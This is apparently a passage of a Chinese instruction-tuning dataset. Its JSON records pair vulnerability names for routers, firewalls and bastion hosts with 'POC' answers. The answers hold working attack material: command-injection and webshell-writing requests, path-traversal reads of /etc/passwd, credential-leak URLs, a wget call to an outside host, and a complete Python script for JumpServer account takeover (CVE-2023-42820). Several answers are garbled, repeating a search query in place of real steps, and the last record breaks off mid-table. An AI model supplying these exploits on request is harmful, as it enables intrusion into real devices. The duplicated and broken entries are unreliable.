  415. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:百为通达 智能流控路由器 open 远程命令执行漏洞\n漏洞描述:BYTEVALUE 百为流控路由器是一款追求带宽利用率的多功能路由器。百为智能流控路由器 /goform/webRead/open 路由存在有回显的命令注入漏洞。\n影响版本:百为通达 智能流控路由器\n网络测绘:``` \"BYTEVALUE 智能流控路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"BYTEVALUE 智能流控路由器\"\n2. GET /goform/webRead/open/?path=|id HTTP/1.1\nHost:\n3. GET /goform/webRead/open/?path=|id HTTP/1.1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/百为通达 智能流控路由器 open 远程命令执行漏洞.md"}
    416. 

  416. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中科网威 下一代防火墙控制系统 账号密码泄露漏洞\n漏洞描述:中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台\n影响版本:``` 中科网威 下一代防火墙控制系统 ```\n网络测绘:``` body=\"Get_Verify_Info(hex_md5(user_string).\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 中科网威 下一代防火墙控制系统\n2. body=\"Get_Verify_Info(hex_md5(user_string).\"\n3. body=\"Get_Verify_Info(hex_md5(user_string).\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/中科网威 下一代防火墙控制系统 账号密码泄露漏洞.md"}
    417. 

  417. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 NBR 1300G路由器 越权CLI命令执行漏洞\n漏洞描述:锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码\n影响版本:``` 锐捷NBR路由器 ```\n网络测绘:``` title=\"锐捷网络 --NBR路由器--登录界面\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"锐捷网络 --NBR路由器--登录界面\"\n2. POST /WEB_VMS/LEVEL15/ HTTP/1.1\nHost: \nConnection: keep-alive\nContent-Length: 73\nAuthorization: Basic\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\nContent-Type: text/plain;charset=UTF-8\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: auth=; user=\nx-forwarded-for: 127.0.0.1\nx-originating-ip: 127.0.0.1\nx-remote-ip: 127.0.0.1\nx-remote-addr: 127.0.0.1\n\ncommand=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.\n3. webmaster level 0 username admin password guest\nwebmaster level 0 username guest password guest\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 NBR 1300G路由器 越权CLI命令执行漏洞.md"}
    418. 

  418. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Wayos 防火墙 账号密码泄露漏洞\n漏洞描述:Wayos 防火墙存在账号密码泄露漏洞,攻击者通过前端可以查看到密码的md5的加密字符,解密后可以登陆后台\n影响版本:``` Wayos 防火墙 ```\n网络测绘:``` body=\"Get_Verify_Info(hex_md5(user_string).\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"Get_Verify_Info(hex_md5(user_string).\"\n2. body=\"Get_Verify_Info(hex_md5(user_string).\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Wayos 防火墙 账号密码泄露漏洞.md"}
    419. 

  419. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 Exec 远程命令执行漏洞\n漏洞描述:绿盟 SAS堡垒机 Exec 远程命令执行漏洞\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. <?php\n  require_once 'Nsc/Websvc/Response.php';\nclass ExecController extends Cavy_Controller_Action {\n\n  var $models = 'no';\n\n  public function index() {\n    $command = $this->_params['cmd'];\n    $ret = 0;\n    $output = array();\n    exec($command,$output,$ret);\n    $result = new StdClass;\n    if ($ret != 0) {\n      $result->code = Nsc_Websvc_Response::EXEC_ERROR;\n      $result->text = \"exec error\";\n    }\n    else {\n      $result->code = Nsc_Websvc_Response::SUCCESS;\n      //\t\t\t$result->text = implode(\"\\n\",$output);\n      $result->text = \"WEBSVC OK\";\n    }\n    $this->_render(array('result'=>$result),'/websvc/result');\n  }\n}\n?>\n3. /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md"}
    420. 

  420. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安恒 明御安全网关 命令执行 任意文件读取漏洞\n漏洞描述:安恒信息明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. /webui/?g=aaa_portal_auth_local_submit&suffix=\n2. /webui/?g=aaa_portal_auth_local_submit&suffix=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111112.php&bkg_flag=0\n3. /webui/?g=aaa_portal_auth_config_reset&type=\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/安恒 明御安全网关 命令执行 任意文件读取漏洞.md"}
    421. 

  421. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:C-Lodop打印机任意文件读取漏洞\n漏洞描述:C-Lodop打印机存在任意文件读取漏洞,通过构造特殊URL,可实现读取系统任意文件。\n网络测绘:``` title=\"C-Lodop\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"C-Lodop\"\n2. GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1\nHost: 127.0.0.1\n....\n3. Host: 127.0.0.1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/C-Lodop打印机任意文件读取漏洞.md"}
    422. 

  422. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:齐治堡垒机 gui_detail_view.php 任意用户登录漏洞\n漏洞描述:齐治堡垒机 存在任意用户登录漏洞,访问特定的Url即可获得后台权限\n影响版本:``` 齐治堡垒机 ```\n网络测绘:``` app=\"齐治科技-堡垒机\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"齐治科技-堡垒机\"\n2. http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm\n3. http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/齐治堡垒机 gui_detail_view.php 任意用户登录漏洞.md"}
    423. 

  423. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kyan 网络监控设备 license.php 远程命令执行漏洞\n漏洞描述:Kyan 网络监控设备 license.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞\n影响版本:``` Kyan ```\n网络测绘:``` app=\"Kyan设计\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Kyan设计\"\n2. <?php\nrequire_once 'config.php';\nrequire_once 'functions.php';\nrequire_once 'international.php';\nsession_start();\nauth_check();\n\n$BASH = \"\";\nif (is_windows()) {\n\t$BASH = \"c:\\\\cygwin\\\\bin\\\\bash --login -c \";\n\t$PREFIX = \"/cygdrive/z/writable/\";\n\t$PREFIX2 = \"/cygdrive/z/\";\n} else {\n\t$BASH = \"/bin/bashsuid -p -c \";\n\t$PREFIX = \"/config/\";\n\t$PREFIX2 = \"/\";\n}\n$encrypt_key = 'enc@leadmeet';\nif ($_SERVER['REQUEST_METHOD'] == 'POST') {\n\tif (!isset($_FILES['fileupload'])) {\n\t\tshow_error(lang_get('no file specified'));\n\t\texit;\n\t}\n\tif ($_FILES['fileupload']['size'] == 0) {\n\t\tshow_error(lang_get('file size is zero'));\n\t\texit;\n\t}\n\t$fileupload = $_FILES['fileupload'];\n\t$destdir = $PREFIX . 'licenses';\n\t$pkg_extract_dir =  $PREFIX2 . 'licenses';\n\t$tmpname = $fileupload['tmp_name'];\n\tif (is_windows()) {\n\t\t$bn = basename($tmpname);\n\t\t$command = \"move /Y \\\"\". $tmpname . \"\\\" c:\\\\cygwin\\\\dev\\\\shm\\\\\" . $bn;\n\t\tshell_exec($command);\n\t\t$tmpname = \"/dev/shm/\" . $bn;\n\t}\n\tshell_exec($BASH.\"\\\"mkdir -p /dev/shm/upload && chmod -R 777 /dev/shm/ \\\"\");\n\texec($BASH.\"\\\"cd /dev/shm/upload && ( bzcat \" . $tmpname . \" | openssl bf-cbc -d -k \" . $encrypt_key . \" | cpio -idu )\\\"\", $output, $ret);\n\tif($ret <> 0)\n\t{\n\t\tshow_error(lang_get('Extract file failed'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\texec($BASH.\"\\\"cd /dev/shm/upload && md5sum -c md5sum\\\"\", $output, $ret);\n\tif($ret <> 0)\n\t{\n\t\tshow_error(lang_get('MD5 check failed'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\tif (is_windows())\n\t\t$dh = opendir('c:\\\\cygwin\\\\dev\\\\shm\\\\upload');\n\telse\n\t\t$dh = opendir('/dev/shm/upload');\n\tif(!$dh)\n\t{\n\t\tshow_error(lang_get('can not open dest dir to copy'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\texec($BASH.\"\\\"touch /tmp/mmap_watch_pause\\\"\");\n\twhile($file = readdir($dh))\n\t{\n\t\tif(is_dir($file)) continue;\n\t\t$file = trim($file);\n\t\tif(ereg('\\.lic$', $file))\n\t\t{\n\t\t\t$filetitle = basename($file, '.lic');\n\t\t\t$extract_dir = $pkg_extract_dir  . '/' . $filetitle;\n\t\t\texec($BASH.\"\\\"\" . $extract_dir . \"/.init stop\\\"\");\n\t\t\texec($BASH.\"\\\"mkdir -p \" . $destdir . \" && mv -f /dev/shm/upload/\" . $file . \" \" . $destdir . \"\\\"\");\n\t\t\texec($BASH.\"\\\"rm -rf \" . $extract_dir . \" && mkdir -p \" . $extract_dir . \" && cd \" . $extract_dir . \" && bzcat \" . $destdir . '/' . $file . \" | cpio -idu \\\"\");\n\t\t}\n\t}\n\tif (!is_windows())\n\t\texec($BASH.\"\\\"/sbin/ldconfig\\\"\");\n\telse\n\t\texec($BASH.\"\\\"rm -rf \". $tmpname .\"\\\"\");\n\texec($BASH.\"\\\"rm -f /tmp/mmap_watch_pause\\\"\");\n\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n}\nif (isset($_GET['cmd']) && isset($_GET['name'])) {\n\t$cmd = $_GET['cmd'];\n\tif ($cmd == 'delete') {\n\t\t$name = $_GET['name'];\n\t\texec($BASH.\"\\\"rm -f \". $PREFIX .\"licenses/\".$name.\"\\\"\");\n\t}\n}\nprint_html_begin('license');\necho \"<table style=\\\"width:500px\\\"  border='0' align='center' cellpadding='3' cellspacing='1'>\\n\";\necho \"<th colspan=2>\".lang_get('licenses').\"</th>\\n\";\necho \"<tr><td>\".lang_get('name').\"</td><td>\".lang_get('operation').\"</td></tr>\\n\";\nif (is_windows())\n\t$dh = opendir('z:\\\\writable\\\\licenses');\nelse\n\t$dh = opendir('/config/licenses');\nif ($dh) {\n\twhile ($file = readdir($dh)) {\n\t\tif (is_dir($file))\n\t\t\tcontinue;\n\t\t$file = trim($file);\n\t\tif (!ereg('\\.lic$', $file))\n\t\t\tcontinue;\n\t\t$filetitle = basename($file, '.lic');\n\t\techo \"<tr><td align=center>\".$filetitle.\"</td><td>\";\n\t\techo \"</td></tr>\\n\";\n\t}\n}\necho \"</table>\\n<br>\\n\";\necho \"<body>\\n\";\necho \"<table style=\\\"width:500px\\\"  border='0' align='center' cellpadding='3' cellspacing='1'>\\n\";\necho \"<form action=\\\"\".$_server['php_self'].\"\\\" method=\\\"post\\\" enctype=\\\"multipart/form-data\\\">\\n\";\necho \"<input type=\\\"hidden\\\" name=\\\"max_file_size\\\" value=\\\"200000000\\\">\\n\";\necho \"<th align=\\\"center\\\" colspan=\\\"2\\\">\".lang_get('licenses to upload').\"</th>\";\necho \"<tr class=\\\"tablebody1\\\"> <td align=\\\"right\\\" width=\\\"50%\\\">\" .lang_get('select file').\"</td><td align=\\\"left\\\"> <input type=\\\"file\\\" name=\\\"fileupload\\\"> </td></tr>\";\necho \"<tr class=\\\"tablebody2\\\"> <td align=\\\"center\\\" colspan=\\\"2\\\">  <input type=\\\"submit\\\" name=\\\"submit\\\" value=\".lang_get('upload').\"> </td></tr>\";\necho \"</form>\\n</table>\\n\";\necho \"</body>\\n\";\nprint_html_end();\n?>\n3. if (isset($_GET['cmd']) && isset($_GET['name'])) {\n\t$cmd = $_GET['cmd'];\n\tif ($cmd == 'delete') {\n\t\t$name = $_GET['name'];\n\t\texec($BASH.\"\\\"rm -f \". $PREFIX .\"licenses/\".$name.\"\\\"\");\n\t}\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Kyan 网络监控设备 license.php 远程命令执行漏洞.md"}
    424. 

  424. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JumpServer 随机数种子泄露导致账户劫持漏洞 CVE-2023-42820\n漏洞描述:JumpServer是一个开源堡垒机系统。在其3.6.4及以下版本中,存在一处账户接管漏洞。攻击者通过第三方库[django-simple-captcha](https://github.com/mbi/django-simple-captcha)泄露的随机数种子推算出找回密码时的用户Token,最终修改用户密码。 参考链接: - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-7prv-g565-82qp - https://mp.weixin.qq.com/s/VShjaDI1McerX843YyOENw - https://www.leavesongs.com/PENETRATION/jumpserver-sep-2023-multiple-vulnerabilities-go-through.html\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2023-42820\n【POC利用方法】\n1. docker compose up -d\n2. python poc.py -t http://your-ip:8080 --email admin@whoami.com --seed [seed] --token [token]\n3. import requests\nimport logging\nimport sys\nimport random\nimport string\nimport argparse\nfrom urllib.parse import urljoin\n\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\nstring_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'\n\n\ndef random_string(length: int, lower=True, upper=True, digit=True, special_char=False):\n    args_names = ['lower', 'upper', 'digit', 'special_char']\n    args_values = [lower, upper, digit, special_char]\n    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]\n    args_string_map = dict(zip(args_names, args_string))\n    kwargs = dict(zip(args_names, args_values))\n    kwargs_keys = list(kwargs.keys())\n    kwargs_values = list(kwargs.values())\n    args_true_count = len([i for i in kwargs_values if i])\n    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'\n    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'\n\n    can_startswith_special_char = args_true_count == 1 and special_char\n\n    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])\n\n    while True:\n        password = list(random.choice(chars) for i in range(length))\n        for k, v in kwargs.items():\n            if v and not (set(password) & set(args_string_map[k])):\n                # 没有包含指定的字符, retry\n                break\n        else:\n            if not can_startswith_special_char and password[0] in args_string_map['special_char']:\n                # 首位不能为特殊字符, retry\n                continue\n            else:\n                # 满足要求终止 while 循环\n                break\n\n    password = ''.join(password)\n    return password\n\n\ndef nop_random(seed: str):\n    random.seed(seed)\n    for i in range(4):\n        random.randrange(-35, 35)\n\n    for p in range(int(180 * 38 * 0.1)):\n        random.randint(0, 180)\n        random.randint(0, 38)\n\n\ndef fix_seed(target: str, seed: str):\n    def _request(i: int, u: str):\n        logging.info('send %d request to %s', i, u)\n        response = requests.get(u, timeout=5)\n        assert response.status_code == 200\n        assert response.headers['Content-Type'] == 'image/png'\n\n    url = urljoin(target, '/core/auth/captcha/image/' + seed + '/')\n    for idx in range(30):\n        _request(idx, url)\n\n\ndef send_code(target: str, email: str, reset_token: str):\n    url = urljoin(target, \"/api/v1/authentication/password/reset-code/?token=\" + reset_token)\n    response = requests.post(url, json={\n        'email': email,\n        'sms': '',\n        'form_type': 'email',\n    }, allow_redirects=False)\n    assert response.status_code == 200\n    logging.info(\"send code headers: %r response: %r\", response.headers, response.text)\n\n\ndef main(target: str, email: str, seed: str, token: str):\n    fix_seed(target, seed)\n    nop_random(seed)\n    send_code(target, email, token)\n    code = random_string(6, lower=False, upper=False)\n    logging.info(\"your code is %s\", code)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='Process some integers.')\n    parser.add_argument('-t', '--target', type=str, required=True, help='target url')\n    parser.add_argument('--email', type=str, required=True, help='account email')\n    parser.add_argument('--seed', type=str, required=True, help='seed from captcha url')\n    parser.add_argument('--token', type=str, required=True, help='account reset token')\n\n    args = parser.parse_args()\n    main(args.target, args.email, args.seed, args.token)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/JumpServer 随机数种子泄露导致账户劫持漏洞 CVE-2023-42820.md"}
    425. 

  425. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网神 SecIPS 3600 debug_info_export 任意文件下载漏洞\n漏洞描述:网神 SecIPS 3600 debug_info_export接口存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器敏感文件\n影响版本:``` 网神 SecIPS 3600 ```\n网络测绘:``` app=\"网神-SecIPS\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 网神 SecIPS 3600\n2. app=\"网神-SecIPS\"\n3. /webui/debug/debug_info_export?filename=default.cfg\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网神 SecIPS 3600 debug_info_export 任意文件下载漏洞.md"}
    426. 

  426. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 NGAF下一代防火墙 login.cgi 远程命令执行漏洞\n漏洞描述:深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 login.cgi 路径下,PHPSESSID 处存在命令执行漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。\n影响版本:深信服 NGAF下一代防火墙\n网络测绘:``` \"Redirect.php?url=LogInOut.php\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"Redirect.php?url=LogInOut.php\"\n2. POST /cgi-bin/login.cgi HTTP/1.1 \nHost: \nCache-Control: max-age=0 \nContent-Type: Application/X-www-Form\ny-forwarded-for: 127.0.0.1\nCookie: PHPSESSID=`$(id > /fwlib/sys/virus/webui/svpn_html/3.txt)`;\n\n{\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"NSLB\" , \"privacy_enable\": \"0\"}}\n3. /svpn_html/3.txt\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/深信服 NGAF下一代防火墙 login.cgi 远程命令执行漏洞.md"}
    427. 

  427. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:迈普 ISG1000安全网关 任意文件下载漏洞\n漏洞描述:迈普 ISG1000安全网关 存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件\n影响版本:``` 迈普 ISG1000安全网关 ```\n网络测绘:``` title=\"迈普通信技术股份有限公司\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 迈普 ISG1000安全网关\n2. title=\"迈普通信技术股份有限公司\"\n3. /webui/?g=sys_dia_data_down&file_name=../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/迈普 ISG1000安全网关 任意文件下载漏洞.md"}
    428. 

  428. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499\n漏洞描述:思科在研究人员Nikita Abramov和Mikhail Klyuchnikov发现的HyperFlex HX数据平台中修复了两个Unauth RCE和一个任意文件上载\n影响版本:``` Cisco HyperFlex HX ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-1499\n【POC利用方法】\n1. Cisco HyperFlex HX\n2. public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n    this.isMultipart = ServletFileUpload.isMultipartContent(request);\n    response.setContentType(\"application/json\");\n    PrintWriter out = response.getWriter();\n    if (!this.isMultipart) {\n      out.println(\"{\\\"result\\\": \\\"Invalid content-type.\\\"}\");\n      logger.error(\"{\\\"result\\\": \\\"Invalid content-type. Must be multi-part\\\"}\");\n      response.setStatus(400);\n      return;\n    }\n    ServletFileUpload upload = new ServletFileUpload();\n    upload.setSizeMax(this.maxFileSize);\n    FileOutputStream fout = null;\n    InputStream stream = null;\n    try {\n      FileItemIterator iter = upload.getItemIterator(request);\n      while (iter.hasNext()) {\n        try {\n          FileItemStream fi = iter.next();\n          stream = fi.openStream();\n          String uploadedFileName = this.dirPath + \"/\" + fi.getName();\n          File uploadedFile = new File(uploadedFileName);\n          fout = new FileOutputStream(uploadedFile);\n          byte[] buffer = new byte[1024];\n          int len;\n          while ((len = stream.read(buffer, 0, buffer.length)) != -1)\n            fout.write(buffer, 0, len);\n          out.println(\"{\\\"result\\\": \\\"filename: \" + uploadedFileName + \"\\\"}\");\n          logger.debug(\"{\\\"result\\\": \\\"filename: \" + uploadedFileName + \"\\\"}\");\n        } catch (org.apache.commons.fileupload.MultipartStream.MalformedStreamException ex) {\n          logger.info(\"MalformedStreamException during file upload servlet stream processing: \" + ex);\n        } finally {\n          if (fout != null) {\n            logger.info(\"Closing fout\");\n            fout.close();\n          }\n          if (stream != null) {\n            logger.info(\"Closing stream\");\n            stream.close();\n          }\n        }\n      }\n    } catch (Exception ex) {\n      out.println(\"{\\\"result\\\": \\\"Upload failed: \" + ex.getMessage() + \"\\\"}\");\n      logger.error(\"{\\\"result\\\": \\\"Upload failed: \" + ex.getMessage() + \"\\\"}\");\n      logger.error(\"Exception during file upload servlet stream processing: \" + ex);\n      response.setStatus(500);\n    }\n3. curl -v http://xxx.xxx.xxx.xxx/upload -F x=@/dev/null\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499.md"}
    429. 

  429. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zyxel 硬编码后门账户漏洞 CVE-2020-29583\n漏洞描述:Zyxel固件中发现的后门被称为关键固件漏洞,CVE编号CVE-2020-29583,得分为7.8 CVSS。虽然CVSS评分看似不是很高,但却不可小觑。研究人员表示,这是一个极为严重的漏洞,所有者必须立即更新其系统。因为任何人都可以轻松利用这个漏洞,从DDoS僵尸网络运营商到勒索软件团体和政府资助的黑客。 通过滥用后门账户,网络罪犯可以访问易受攻击的设备并感染内部网络以发起其他攻击。攻击者可以使用管理特权登录设备,并轻易破坏网络设备。\n影响版本:``` Zyxel USG系列 Zyxel ATP系列 Zyxel NCX系列 Zyxel USG FIEX系列 Zyxel VPN系列 ```\n网络测绘:``` title=\"USG40\" \"NXC2500\" 等 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-29583\n【POC利用方法】\n1. Zyxel USG系列\n\nZyxel ATP系列\n\nZyxel NCX系列\n\nZyxel USG FIEX系列\n\nZyxel VPN系列\n2. title=\"USG40\"\n\n\"NXC2500\" 等\n3. [scan_CVE-2020-29583](https://github.com/2d4d/scan_CVE-2020-29583)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Zyxel 硬编码后门账户漏洞 CVE-2020-29583.md"}
    430. 

  430. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078\n漏洞描述:D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面\n影响版本:``` DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703 ```\n网络测绘:``` app=\"D_Link-DCS-2530L\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-25078\n【POC利用方法】\n1. DCS-2530L\nDCS-2670L\nDCS-4603\nDCS-4622\nDCS-4701E\nDCS-4703E\nDCS-4705E\nDCS-4802E\nDCS-P703\n2. app=\"D_Link-DCS-2530L\"\n3. http://xxx.xxx.xxx.xxx/config/getuser?index=0\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078.md"}
    431. 

  431. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Teleport堡垒机 get-file 后台任意文件读取漏洞\n漏洞描述:Teleport堡垒机 get-file接口存在后台任意文件读取漏洞,攻击者利用任意用户登录漏洞后可以获取后台权限,再进一步利用任意文件读取获取服务器上的敏感文件\n影响版本:``` Teleport Version <= 20220817 ```\n网络测绘:``` app=\"TELEPORT堡垒机\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Teleport Version <= 20220817\n2. app=\"TELEPORT堡垒机\"\n3. /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Teleport堡垒机 get-file 后台任意文件读取漏洞.md"}
    432. 

  432. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Arcadyan固件 image 路径遍历漏洞 CVE-2021-20090\n漏洞描述:Arcadyan 制造的网络设备的 Web 界面中存在路径遍历漏洞,包括 Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24,可能允许未经身份验证的远程攻击者绕过身份验证。\n影响版本:| **Vendor**          | **Device**                         | **Found on version** | | ------------------- | ---------------------------------- | -------------------- | | ADB                 | ADSL wireless IAD router           | 1.26S-R-3P           | | Arcadyan            | ARV7519                            | 00.96.00.96.617ES    | | Arcadyan            | VRV9517                            | 6.00.17 build04      | | Arcadyan            | VGV7519                            | 3.01.116             | | Arcadyan            | VRV9518                            | 1.01.00 build44      | | ASMAX               | BBR-4MG / SMC7908 ADSL             | 0.08                 | | ASUS                | DSL-AC88U (Arc VRV9517)            | 1.10.05 build502     | | ASUS                | DSL-AC87VG (Arc VRV9510)           | 1.05.18 build305     | | ASUS                | DSL-AC3100                         | 1.10.05 build503     | | ASUS                | DSL-AC68VG                         | 5.00.08 build272     | | Beeline             | Smart Box Flash                    | 1.00.13_beta4        | | British Telecom     | WE410443-SA                        | 1.02.12 build02      | | Buffalo             | WSR-2533DHPL2                      | 1.02                 | | Buffalo             | WSR-2533DHP3                       | 1.24                 | | Buffalo             | BBR-4HG                            |                      | | Buffalo             | BBR-4MG                            | 2.08 Release 0002    | | Buffalo             | WSR-3200AX4S                       | 1.1                  | | Buffalo             | WSR-1166DHP2                       | 1.15                 | | Buffalo             | WXR-5700AX7S                       | 1.11                 | | Deutsche Telekom    | Speedport Smart 3                  | 010137.4.8.001.0     | | HughesNet           | HT2000W                            | 0.10.10              | | KPN                 | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453     | | KPN                 | VGV7519                            | 3.01.116             | | O2                  | HomeBox 6441                       | 1.01.36              | | Orange              | LiveBox Fibra (PRV3399)            | 00.96.00.96.617ES    | | Skinny              | Smart Modem (Arcadyan VRV9517)     | 6.00.16 build01      | | SparkNZ             | Smart Modem (Arcadyan VRV9517)     | 6.00.17 build04      | | Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM      | 1.01.00 build44      | | TelMex              | PRV33AC                            | 1.31.005.0012        | | TelMex              | VRV7006                            |                      | | Telstra             | Smart Modem Gen 2 (LH1000)         | 